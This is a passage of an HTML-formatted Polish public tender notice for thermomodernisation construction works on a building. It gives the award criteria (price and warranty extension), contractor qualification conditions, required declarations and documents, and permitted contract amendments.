wszystkich ofert podlegających badaniu<br/>Liczbę miesięcy określającej wydłużenie okresu gwarancji należy podać w liczbach naturalnych. Podanie liczby ujemnej, liczby zawierającej ułamki mniejsze od 1, lub liczby 0 (zero) miesięcy spowoduje, że oferta otrzyma 0 punktów w tym kryterium. W przypadku podania liczby ułamkowej większej od 1, do oceny w ramach tego kryterium oceny ofert zostanie przyjęta wartość całkowita wynikająca z tego ułamka, z zastrzeżeniem poniższego ograniczenia.<br/>Wykonawcy mogą zaoferować maksymalne wydłużenie okresu gwarancji wynoszące 24 miesiące. W przypadku zaoferowania wydłużenia okresu gwarancji o okres dłuższy niż 24 miesiące do oceny w ramach kryterium oceny ofert przyjęte zostanie 24 miesięczne wydłużenie Gwarancji. <br/>W umowie w sprawie zamówienia publicznego obowiązywać będzie okres gwarancji zadeklarowany przez Wykonawcę w ofercie.<br/>5.	Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem: <br/>O = C + G<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6.	Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7.	Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane, termomodernizacyjne budynku polegające na wymianie stolarki okiennej i drzwiowej od strony elewacji budynku, wykonaniu drenażu wokół budynku, dociepleniu ścian elewacyjnych styropianem gr. 15 cm. wraz z tynkiem mineralnym, wykonanie elewacji z paneli, ułożenie podsufitki z listew drewnianych wraz z malowaniem, licowanie płytkami cokołu, remont schodów zewnętrznych wraz z chodnikiem- wymiana płytek. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 292377,73 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45442110-1 - Malowanie budynków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W stosunku do przedmiotu zamówienia Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do łącznej ilości wszystkich czynności wycenionych w każdej z pozycji kosztorysu ofertowego stanowiącego część Oferty („Opcja”). Przedmiotem Opcji będą takie same (analogiczne prace), jak opisane w SWZ i wycenione przez Wykonawcę w którejkolwiek z pozycji kosztorysu ofertowego stanowiącego część Oferty. W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych przez Wykonawcę w kosztorysie ofertowym stanowiącym część Oferty.<br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % Wartości Przedmiotu Umowy określonej zgodnie z § 7 ust 1 stanowiącego załącznik nr 10 do SWZ. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac zawarte w kosztorysie ofertowym stanowiącym część Oferty.<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie. <br/>Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: (1) wystąpienia potrzeby zwiększenia zakresu rzeczowego robót budowlanych stanowiących przedmiot zamówienia na skutek warunków przyrodniczych, klimatycznych bądź atmosferycznych, (2) powierzenia Zamawiającemu nowych zadań inwestycyjnych lub publicznych, (3) braku możliwości wyłonienia z przyczyn obiektywnych wykonawców robót budowlanych w ramach podstawowych trybów udzielania zamówień, celem zabezpieczenia niezbędnego wykonawstwa prac oraz (4) powierzania wykonawcy prac stanowiących wykonawstwo zastępcze w stosunku do prac realizowanych przez innego wykonawcę. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie w okresie 3 lat od dnia udzielenia zamówienia podstawowego, zamówienia polegającego na powtórzeniu podobnych robót budowlanych i zgodnego z przedmiotem zamówienia podstawowego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp – o wartości do 50 % szacunkowej wartości zamówienia podstawowego.<br/>2.	Zamówienia, o których mowa w ust. 1, mogą zostać udzielone w szczególności w przypadku wystąpienia potrzeby zwiększenia zakresu rzeczowego robót, stanowiących przedmiot zamówienia na skutek warunków atmosferycznych, wystąpienia robót dodatkowych i zamiennych lub powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/>3.	Zamówienia, o których mowa w ust. 1, mogą zostać udzielone po przeprowadzeniu odrębnego postępowania o udzielenie zamówienia publicznego w trybie zamówienia z wolnej ręki</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane wg następującego wzoru:<br/>1)	W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty. Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego wzoru: <br/>Cmin<br/>C = ------------------ x 100 pkt x 60%<br/>Co<br/><br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>2)	W ramach kryterium „Wydłużenie okresu gwarancji - G” oceniane będzie wydłużenie okresu Gwarancji na roboty budowlane w stosunku do minimalnego Okresu Gwarancji wynikającego z SWZ (tj. 12 miesięcy od dnia odbioru końcowego robót poświadczonego protokołem odbioru końcowego). Do oceny w ramach kryterium zostanie przyjęty Okres Gwarancji zadeklarowany w formularzu oferty.<br/>Ocena ofert w tym kryterium będą zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Go <br/>G = ------------------- x 100 pkt x 40%<br/>Gmax<br/><br/>gdzie:<br/>G – liczba punktów w kryterium „Wydłużenie okresu gwarancji”<br/>Go – długość okresu wydłużenia gwarancji podana w ocenianej ofercie<br/>Gmax – największa długość okresu wydłużenia gwarancji ze wszystkich ofert podlegających badaniu<br/>Liczbę miesięcy określającej wydłużenie okresu gwarancji należy podać w liczbach naturalnych. Podanie liczby ujemnej, liczby zawierającej ułamki mniejsze od 1, lub liczby 0 (zero) miesięcy spowoduje, że oferta otrzyma 0 punktów w tym kryterium. W przypadku podania liczby ułamkowej większej od 1, do oceny w ramach tego kryterium oceny ofert zostanie przyjęta wartość całkowita wynikająca z tego ułamka, z zastrzeżeniem poniższego ograniczenia.<br/>Wykonawcy mogą zaoferować maksymalne wydłużenie okresu gwarancji wynoszące 24 miesiące. W przypadku zaoferowania wydłużenia okresu gwarancji o okres dłuższy niż 24 miesiące do oceny w ramach kryterium oceny ofert przyjęte zostanie 24 miesięczne wydłużenie Gwarancji. <br/>W umowie w sprawie zamówienia publicznego obowiązywać będzie okres gwarancji zadeklarowany przez Wykonawcę w ofercie.<br/>5.	Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem: <br/>O = C + G<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>6.	Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7.	Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	W zakresie zdolności technicznej i zawodowej:<br/>1)	W zakresie doświadczenia<br/><br/>Warunek zostanie spełniony jeżeli Wykonawca wykaże że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie zrealizował bądź realizuje (przy czym w tym przypadku będzie liczona wartość zrealizowanej części przedmiotu umowy) co najmniej jedną robotę budowlaną (przez jedną robotę rozumie się wykonanie prac na podstawie jednej umowy), w skład której wchodziły roboty budowlane charakterem odpowiadające przedmiotowi zamówienia polegające na wykonaniu budowy, przebudowy, remontu budynku o wartości robót co najmniej 100 000,00 PLN brutto (słownie: sto tysięcy zł, 00/100).<br/>2)	W zakresie osób skierowanych do realizacji zamówienia<br/>Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował następującymi osobami, które skieruje do realizacji zamówienia, w tym:<br/>a) kierownik budowy- posiadający uprawnienia w specjalności konstrukcyjnej uprawniające do kierowania robotami w przedmiotowym zakresie, zgodnie z przepisami art. 13 i 14 Prawa budowlanego lub odpowiadające im uprawnienia wcześniejsze, lub posiadającym uprawnienia wydane w innych Państwach Członkowskich Unii Europejskiej uznane zgodnie z przepisami Ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, (t. j. Dz. U. 2020 r., poz. 220 z późniejszymi zmianami), <br/><br/>3)	W zakresie dysponowania potencjałem technicznym<br/>Wykonawca dysponuje (lub będzie dysponować) co najmniej następującymi maszynami i pojazdami: Zamawiający nie stawia warunku w tym zakresie.<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu<br/>o informacje zawarte w dokumentach lub oświadczeniach złożonych przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego Zamawiający żąda: <br/>a)	oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz.U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 8 do SWZ);*<br/>b)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;*<br/>c)	oświadczenia wykonawcy o aktualności informacji zawartych w Oświadczeniu o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie podstaw wykluczenia z postępowania, o których mowa w:<br/> i)	art. 108 ust. 1 pkt 1 i 2 ustawy,<br/>ii)	art. 108 ust. 1 pkt 3 ustawy,<br/>iii)	art. 108 ust. 1 pkt 4 ustawy <br/>iv)	art. 108 ust. 1 pkt 6 ustawy, <br/>v)	art. 109 ust. 1 pkt 1 ustawy, <br/>vi)	art. 109 ust. 1 pkt 5, 7-10 ustawy.<br/>(wzór oświadczenia stanowi załącznik nr 9 do SWZ).<br/>5.	Podmiotowe środki dowodowe, które będzie zobowiązany złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, który ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej. Wykonawca zagraniczny zamiast: <br/>1)	odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w ust. 4 pkt 2) lit. b)* – składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:*<br/>a)	nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.*<br/>2)	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. <br/>Dokumenty, o których mowa w pkt 1) , powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do<br/>oferty każdy Wykonawca musi dołączyć „Oświadczenie o<br/>niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu”, w zakresie wskazanym w rozdziale 6 ust. 1 i ust. 2 oraz<br/>w rozdziale 5 ust. 2 pkt 1), pkt 2) SWZ. Oświadczenie to stanowić będzie<br/>dowód, potwierdzający brak podstaw wykluczenia lub spełnianie warunków udziału w postępowaniu na<br/>dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe (wzór ośw.-zał. nr 3 do SWZ).2. Podmiotowe środki dowodowe składane wraz z ofertą – jeżeli dotyczy.<br/>1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do oferty<br/>„Oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy” –<br/>jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia polegają na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane (wzór oświadczenia zał. nr 4 do SWZ).<br/>2) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, ma<br/>obowiązek złożyć wraz z ofertą, „Zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia” lub innypodmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – jeżeli w odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których<br/>te zdolności są wymagane (wzór zobowiązania zał. nr 5 do SWZ)Podmiotowe środki dowodowe, które na wezwanie Zamawiającego zobowiązany będzie złożyć Wykonawca, którego oferta zostanie najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualne na dzień ich złożenia. <br/>1)	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda: <br/>a)	Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 1) niniejszego SWZ (wzór wykazu stanowi załącznik nr 6 do SWZ);<br/>b)	Wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień i doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - w zakresie niezbędnym do wykazania spełniania warunku udziału w postępowaniu, określonego w rozdz. 5 ust. 2. pkt 2) niniejszego SWZ (wzór wykazu stanowi załącznik nr 7 do SWZ);</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Inne dokumenty i oświadczenia składane wraz z ofertą.<br/>1) W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowany do jego<br/>reprezentowania, Wykonawcy ma obowiązek złożyć odpis lub informację z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru.<br/>Wykonawca nie jest zobowiązany do złożenia powyższych dokumentów, jeżeli Zamawiający<br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca<br/>wskazał dane umożliwiające dostęp do tych dokumentów.<br/>Uwaga: w przypadku, gdy w imieniu Wykonawcy ofertę podpisuje pełnomocnik, w tym również<br/>pełnomocnik ujawniony na podstawie przepisu art. 39 ust. 3 ustawy z dnia 06 marca 2018 r. o<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej i Punkcie Informacji dla<br/>Przedsiębiorcy (t. j. Dz. U. 2020 r., poz. 2296), konieczne jest przedłożenie razem z ofertą<br/>pełnomocnictwa, w sposób określony w pkt 2) poniżej.<br/>2) Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby lub podwykonawcy niebędącego podmiotem<br/>udostępniającym zasoby, działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z powyższych dokumentów, należy złożyć pełnomocnictwo lub inny dokument potwierdzający<br/>umocowanie do reprezentowania Wykonawcy, Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby lub podwykonawcy<br/>niebędącego podmiotem udostępniającym zasoby.<br/>Pełnomocnictwo powinno być złożone w oryginale jako dokument elektroniczny lub w postacicyfrowego odwzorowania dokumentu sporządzonego w postaci papierowej (elektronicznej<br/>kopii), poświadczonej za zgodność z oryginałem przez mocodawcę albo notarialnie.Do oferty należy załączyć, jeżeli<br/>dotyczy:<br/>1) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi<br/>załącznik nr 4 do SWZ),<br/>2) Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w rozdziale 7 ust. 2 pkt 2)<br/>niniejszego SWZ, potwierdzające oddanie Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia (wzór zobowiązania stanowi załącznik nr 5 do SWZ), <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek dołączyć do<br/>oferty „Oświadczenie, które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>Wykonawcy” – jeżeli w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia polegają na zdolnościach tych z Wykonawców, którzy wykonają<br/>roboty budowlane lub usługi, do realizacji których te zdolności są wymagane (wzór oświadczenia<br/>stanowi załącznik nr 4 do SWZ).<br/>2) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby,<br/>ma obowiązek złożyć wraz z ofertą, „Zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia” lub<br/>inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów – jeżeli w odniesieniu do warunków<br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia polegają na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane<br/>lub usługi, do realizacji których te zdolności są wymagane (wzór zobowiązania stanowi załącznik<br/>nr 5 do SWZ).<br/>Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa wyżej, powinno potwierdzać,<br/>że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określać w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>b) sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>Treść zobowiązania powinna bezspornie i jednoznacznie wskazywać na zakres zobowiązania<br/>innego podmiotu, określać, czego dotyczy zobowiązanie oraz w jaki sposób i w jakim okresie<br/>będzie ono wykonywane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści<br/>oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej<br/>jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich<br/>wprowadzenia:<br/>1. Zmiana terminu realizacji Przedmiotu Umowy w przypadku zaistnienia jednej lub kilku<br/>wymienionych poniżej okoliczności:<br/>1) spowodowanych warunkami zewnętrznymi, w szczególności:<br/>a. klęskami żywiołowymi, w tym w szczególności epidemią wirusa Sars-Cov-2, warunkami<br/>atmosferycznymi odbiegającymi od naturalnych (np. ponadprzeciętne opady deszczu lub śniegu, długotrwała susza, zjawiska nietypowe dla danej strefy klimatycznej);<br/>2) spowodowanych warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności:<br/>a. odnalezieniem niewypałów i niewybuchów,<br/>b. stwierdzeniem odmiennych od przyjętych w dokumentacji projektowej warunki geologiczne<br/>(np. kategorie gruntu);<br/>3) będących następstwem zdarzeń leżących po stronie Zamawiającego, takich jak w<br/>szczególności:<br/>a. wstrzymaniem robót przez Zamawiającego,<br/>b. koniecznością usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej;<br/>4) będących następstwem działania organów administracji, w szczególności takich jak np.:<br/>a. odmową wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na<br/>skutek błędów w dokumentacji projektowej,<br/>b. wstrzymaniem robót budowlanych przez organy nadzoru;<br/>5) stanowiących inne przyczyny zewnętrzne niezależne od Zamawiającego oraz Wykonawcy<br/>skutkujące niemożliwością prowadzenia prac takie jak np. błędy oraz niedopatrzenia powstałe w<br/>wyniku działalności człowieka, których skutki mogą doprowadzić do znacznej modyfikacji<br/>pierwotnych założeń projektu.<br/>W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1)-5) termin<br/>wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia<br/>wykonywania jej przedmiotu w sposób należyty, stosowanie do okresu trwania tych okoliczności<br/>oraz skutków, które te okoliczności wywołały.<br/>2. Zmiana sposobu spełnienia świadczenia:<br/>1) zmiany technologiczne, w szczególności:<br/>a. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań<br/>technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby<br/>zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem<br/>projektu,<br/>b. odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (np. kategorie<br/>gruntu) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych<br/>założeniach technologicznych;<br/>c. konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub<br/>materiałowych ze względu na zmiany obowiązującego prawa<br/>Zmiany wskazywane w lit. c będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie<br/>przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia<br/>wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu<br/>kosztom.<br/>Każda ze wskazywanych w lit. a – c zmian może być powiązana z obniżeniem wynagrodzenia na<br/>zasadach określonych przez Strony.<br/>3. Pozostałe zmiany:<br/>1) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku<br/>wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiającyzapłaci za wszystkie spełnione<br/>świadczenia oraz udokumentowane koszty, które 